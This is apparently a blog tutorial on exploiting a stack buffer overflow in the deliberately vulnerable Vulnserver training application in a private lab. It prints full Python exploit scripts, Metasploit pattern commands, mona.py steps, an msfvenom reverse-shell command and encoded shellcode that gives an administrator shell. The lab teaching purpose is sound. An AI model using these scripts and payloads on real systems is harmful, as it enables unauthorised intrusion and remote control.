Easy Steps to Exploit Windows-Based Buffer Overflow (Vulnserver)

Exploiting Vulnserver with TRUN parameter

stephenbradshaw/vulnserver

EASY STEPS

Part 1

1. Fuzzing the service parameter and getting the crash byte
2. Generating the pattern
3. Finding the correct offset where the byte crashes with the help of (EIP)

Part 2

1. Finding the bad character with mona.py, and comparing bad character strings with mona.py
2. Finding return address (JMP ESP) with mona.py

Part 3

1. Setting breakpoint to verify RETURN address is correct or not
2. Creating reverse shell with the help of msfvenom
3. Adding NOP’s to the script
4. Getting shell

Exploiting VulnServer buffer overflow

In this blog, we are going to exploit vulnserver of which TRUN parameter in ABYSS service is vulnerable to buffer overflow and we will follow all the above steps for exploiting the service

Tools/OS used :

Attacker Machine : Kali Linux Rolling
Victim Host : Windows 7 ultimate 32 bit
Vulnserver application (github)
Immunity Debugger v1.85

NOTES :-

Attacker’s IP : 10.0.0.1
Victim’s IP : 10.0.0.36
Vulnerable port : 9999 ( Vulnserver )
Vulnerable parameter : TRUN

Things to remember :-

Attach the application to immunity debugger using FIle > Attach > vulnserver > Attach

Restart the service every single time when you send buffer bytes

For restarting the service use Debug > Restart , and then run the application again Debug > Run

Let’s start enumerating :-

nmap -sCV -A -v 10.0.0.36

Starting our work

Part 1

• Fuzzing the Service’s parameter and locating EIP

Fuzzing serivce’s parameter :- In this step we are checking vulnserver TRUN parameter is vulnerable to buffer overflow or not.

Using python script which generates bytes and fuzz it into TRUN parameter using “socket modules” for getting the crash byte

#!/usr/bin/python
import os
import sys
import socket
host = “10.0.0.36”
port = 9999
buffer = “A” * 3000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print “[*] Sending exploit…”
s.send(“TRUN /.:/” + buffer)
print s.recv(1024)
s.close()

Fuzz.py 👆

Now we are going to set a working directory in Immunity Debugger , and we will use it later.

Using this command

!mona config -set workingfolder c:\logs\%p

This will create a working directory now, let’s fuzz the parameter with our script

• fuzzing the script

As we can see here, EIP Register is overwritten by 41414141 (hex value of “AAAA”) which means an application is vulnerable to Buffer Overflow at approx 3000 bytes.

NOTE : Restart the vulnserver after each crash

• Now we will generate the pattern

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000

Here we had created the pattern and using this we will find out the the exact byte location of Offset (EIP) using pattern_offset.rb (Metasploit tool).

Now we will replace the pattern with buffer variable in the python script

#!/usr/bin/python
import os
import sys
import socket
host = “10.0.0.36”
port = 9999
buffer = “Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9”
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print “[*] Sending exploit…”
s.send(“TRUN /.:/” + buffer)
print s.recv(1024)
s.close()

Here we had replaced the “A” * 3000 with the the pattern we created now let’s fuzz the script again

Here we can see EIP register hold value “386F4337" which is now used to determine exact byte location of Offset (EIP)

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337

Things to remember : exact byte location of EIP (offset) is 2003

Verifying Offset (EIP) and ESP starting

In this step, we are going to verify Offset (EIP) exact byte location using bytes which we got from the last step and also check the ESP starting where we will inject malicious shellcode in next step

In below python script, we added 2003 of A, 4 of B to verify offset (EIP) and 350 of C because msfvenom generates approx 350 bytes of shellcode. After running python script if results inEIP value of 42424242 (Hex value of B) which means we have correctly found Offset (EIP) byte value.

#!/usr/bin/python
import os
import sys
import socket
host = “10.0.0.36”
port = 9999
buffer = “A” * 2003 + “B” * 4 + “C” * 350
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print “[*] Sending exploit…”
s.send(“TRUN /.:/” + buffer)
print s.recv(1024)
s.close()

Run the python script and let’s verify the result in Immunity Debugger

As we can see EIP register successfully overwritten by 42424242 (Hex value of B) which mean we have found exact byte location of EIP register.

Now verify ESP should directly points to the beginning of C

Here we can see ESP directly pointing to the beginning of C just after EIP and we have already won 1/3 of battel against this vulnserver Service.

Part 2

Finding bad characters

Bad Characters: Bad characters are the type of unwanted characters which conflicts with our shellcode and breaks it. Bad characters vary from application to application and protocol to protocol.

Generating bytearray (bad character ) with mona.py

!mona bytearray -b '\x00'

For bytearray file location C:\logs\vulnserver here you will find the bytearray file

Copy the generated bad character and copy it to our script (except null byte)

#!/usr/bin/python
import os
import sys
import socket
host = “10.0.0.36”
port = 9999

badchar = (“\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20”
“\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40”
“\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60”
“\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80”
“\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0”
“\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0”
“\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0”
“\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff”)
buffer = “A” * 2003 + “B” * 4 + badchar
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print “[*] Sending exploit…”
s.send(“TRUN /.:/” + buffer)
print s.recv(1024)
s.close()

Comparing Bad Character Strings with Mona.py

This step going to more lengthy. In this step, we will send bad characters using a script which we create from the last step recursively and analysis the bad characters in immunity debugger using mona.py

Now run the below script which we created and compare the bad characters in immunity debugger with bytearray.bin file using below command

!mona compare -f C:\logs\vulnserver\bytearray.bin -a 017AF9E0

Note: ESP changes when we made any changes in our script, don’t forget to add latest ESP Address on each crash.

we have got Unmodified in Status in Mona.py. In this part 2 of this blog, we have found 1bad characters using Mona.py that are “\x00”

Things to Remember: Bad Character = “\x00”

Part 3

Finding Return address and Exploitation

In this part of this blog, we will find JMP ESP Address for our shellcode and also generate shellcode for our final exploit
Below Link solve your doubt related why to use JMP ESP Address
https://security.stackexchange.com/questions/157478/why-jmp-esp-instead-of-directly-jumping-into-the-stack

• Finding a Return Address (JMP ESP) with mona.py

In this step, we will find the Return Address (JMP ESP) using mona.py to redirect execution flow directly to the ESP.
Run below command to show all .dll (modules) application loaded and select .dll in which Rebase, SafeSEH, ASLR, NXCompat — all of this are False
!mona modules

Here we can see in the above gif that In essfunc.dll all of our required Rebase, SafeSEH, ASLR, NXCompat are sets to False. We are now proceeding further with this Module.

!mona find -s "\xff\xe4" -m essfunc.dll

Now we have found JMP ESP Address in essfunc.dll that is 0x625011AF

Things to Remember: JMP ESP Address is 0x625011AF

Setting Breakpoint to Verify Return Address (RET Address) is Correct

bp 0x625011Af

And Press ENTER

You can also confirm it by seeing “View > Breakpoints”

Now replace B with “\xAF\x11\x50\x62” (fliped because of Little Endian Format) in python script

#!/usr/bin/python
import os
import sys
import socket
host = “10.0.0.36”
port = 9999
#jmp 625011AF
#badchar = \x00 
payload = (“\xdb\xdc\xd9\x74\x24\xf4\xb8\x85\xb6\xc8\xe1\x5b\x31\xc9\xb1”
“\x52\x83\xeb\xfc\x31\x43\x13\x03\xc6\xa5\x2a\x14\x34\x21\x28”
“\xd7\xc4\xb2\x4d\x51\x21\x83\x4d\x05\x22\xb4\x7d\x4d\x66\x39”
“\xf5\x03\x92\xca\x7b\x8c\x95\x7b\x31\xea\x98\x7c\x6a\xce\xbb”
“\xfe\x71\x03\x1b\x3e\xba\x56\x5a\x07\xa7\x9b\x0e\xd0\xa3\x0e”
“\xbe\x55\xf9\x92\x35\x25\xef\x92\xaa\xfe\x0e\xb2\x7d\x74\x49”
“\x14\x7c\x59\xe1\x1d\x66\xbe\xcc\xd4\x1d\x74\xba\xe6\xf7\x44”
“\x43\x44\x36\x69\xb6\x94\x7f\x4e\x29\xe3\x89\xac\xd4\xf4\x4e”
“\xce\x02\x70\x54\x68\xc0\x22\xb0\x88\x05\xb4\x33\x86\xe2\xb2”
“\x1b\x8b\xf5\x17\x10\xb7\x7e\x96\xf6\x31\xc4\xbd\xd2\x1a\x9e”
“\xdc\x43\xc7\x71\xe0\x93\xa8\x2e\x44\xd8\x45\x3a\xf5\x83\x01”
“\x8f\x34\x3b\xd2\x87\x4f\x48\xe0\x08\xe4\xc6\x48\xc0\x22\x11”
“\xae\xfb\x93\x8d\x51\x04\xe4\x84\x95\x50\xb4\xbe\x3c\xd9\x5f”
“\x3e\xc0\x0c\xcf\x6e\x6e\xff\xb0\xde\xce\xaf\x58\x34\xc1\x90”
“\x79\x37\x0b\xb9\x10\xc2\xdc\xcc\xe4\xcc\x1d\xb9\xe6\xcc\x1c”
“\x82\x6e\x2a\x74\xe4\x26\xe5\xe1\x9d\x62\x7d\x93\x62\xb9\xf8”
“\x93\xe9\x4e\xfd\x5a\x1a\x3a\xed\x0b\xea\x71\x4f\x9d\xf5\xaf”
“\xe7\x41\x67\x34\xf7\x0c\x94\xe3\xa0\x59\x6a\xfa\x24\x74\xd5”
“\x54\x5a\x85\x83\x9f\xde\x52\x70\x21\xdf\x17\xcc\x05\xcf\xe1”
“\xcd\x01\xbb\xbd\x9b\xdf\x15\x78\x72\xae\xcf\xd2\x29\x78\x87”
“\xa3\x01\xbb\xd1\xab\x4f\x4d\x3d\x1d\x26\x08\x42\x92\xae\x9c”
“\x3b\xce\x4e\x62\x96\x4a\x7e\x29\xba\xfb\x17\xf4\x2f\xbe\x75”
“\x07\x9a\xfd\x83\x84\x2e\x7e\x70\x94\x5b\x7b\x3c\x12\xb0\xf1”
“\x2d\xf7\xb6\xa6\x4e\xd2”)
buffer = “A” * 2003 + ‘\xAF\x11\x50\x62’ + ‘\x90’ * 20 + payload
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print “[*] Sending exploit…”
s.send(“TRUN /.:/” + buffer)
print s.recv(1024)
s.close()

Run the script and verify breakpoint hit in immunity debugger as well as PRESS F7 two times to execute the PUSH ESP and RET instructions to verify that execution is redirected to the beginning of our Cs

We can see here everything is working fine, our script also hitting breakpoint.

Create Reverse Connection Shellcode using Msfvenom
In this step, we are going to generate inline reverse shell payload with excluding bad characters that we found in part 2 of this blog and add that shellcode into python script in place of Cs
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=443 -e x86/shikata_ga_nai -b "\x00" -f c

Adding approx 20 NOP’s and getting shell

In this last step, we add the nop’s (\x90) into buffer variable and run a final exploit on victim machines to get a reverse shell of it

#!/usr/bin/python
import os
import sys
import socket
host = “10.0.0.36”
port = 9999
#jmp 625011AF
#badchar = \x00 
payload = (“\xd9\xc5\xba\xc6\x09\x98\xda\xd9\x74\x24\xf4\x58\x31\xc9\xb1”
“\x52\x83\xe8\xfc\x31\x50\x13\x03\x96\x1a\x7a\x2f\xea\xf5\xf8”
“\xd0\x12\x06\x9d\x59\xf7\x37\x9d\x3e\x7c\x67\x2d\x34\xd0\x84”
“\xc6\x18\xc0\x1f\xaa\xb4\xe7\xa8\x01\xe3\xc6\x29\x39\xd7\x49”
“\xaa\x40\x04\xa9\x93\x8a\x59\xa8\xd4\xf7\x90\xf8\x8d\x7c\x06”
“\xec\xba\xc9\x9b\x87\xf1\xdc\x9b\x74\x41\xde\x8a\x2b\xd9\xb9”
“\x0c\xca\x0e\xb2\x04\xd4\x53\xff\xdf\x6f\xa7\x8b\xe1\xb9\xf9”
“\x74\x4d\x84\x35\x87\x8f\xc1\xf2\x78\xfa\x3b\x01\x04\xfd\xf8”
“\x7b\xd2\x88\x1a\xdb\x91\x2b\xc6\xdd\x76\xad\x8d\xd2\x33\xb9”
“\xc9\xf6\xc2\x6e\x62\x02\x4e\x91\xa4\x82\x14\xb6\x60\xce\xcf”
“\xd7\x31\xaa\xbe\xe8\x21\x15\x1e\x4d\x2a\xb8\x4b\xfc\x71\xd5”
“\xb8\xcd\x89\x25\xd7\x46\xfa\x17\x78\xfd\x94\x1b\xf1\xdb\x63”
“\x5b\x28\x9b\xfb\xa2\xd3\xdc\xd2\x60\x87\x8c\x4c\x40\xa8\x46”
“\x8c\x6d\x7d\xc8\xdc\xc1\x2e\xa9\x8c\xa1\x9e\x41\xc6\x2d\xc0”
“\x72\xe9\xe7\x69\x18\x10\x60\x9c\xdd\x1a\x71\xc8\xdf\x1a\x70”
“\xb3\x69\xfc\x18\xd3\x3f\x57\xb5\x4a\x1a\x23\x24\x92\xb0\x4e”
“\x66\x18\x37\xaf\x29\xe9\x32\xa3\xde\x19\x09\x99\x49\x25\xa7”
“\xb5\x16\xb4\x2c\x45\x50\xa5\xfa\x12\x35\x1b\xf3\xf6\xab\x02”
“\xad\xe4\x31\xd2\x96\xac\xed\x27\x18\x2d\x63\x13\x3e\x3d\xbd”
“\x9c\x7a\x69\x11\xcb\xd4\xc7\xd7\xa5\x96\xb1\x81\x1a\x71\x55”
“\x57\x51\x42\x23\x58\xbc\x34\xcb\xe9\x69\x01\xf4\xc6\xfd\x85”
“\x8d\x3a\x9e\x6a\x44\xff\xae\x20\xc4\x56\x27\xed\x9d\xea\x2a”
“\x0e\x48\x28\x53\x8d\x78\xd1\xa0\x8d\x09\xd4\xed\x09\xe2\xa4”
“\x7e\xfc\x04\x1a\x7e\xd5”)
buffer = “A” * 2003 + ‘\xAF\x11\x50\x62’ + ‘\x90’ * 20 + payload
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print “[*] Sending exploit…”
s.send(“TRUN /.:/” + buffer)
print s.recv(1024)
s.close()

Starting nc at our local pc for getting reverse shell and running our final script for reverse shell

COWABUNGA !!!!!! got administrator shell 💣

THANKYOU , clap if you like it and feedback are welcome 👍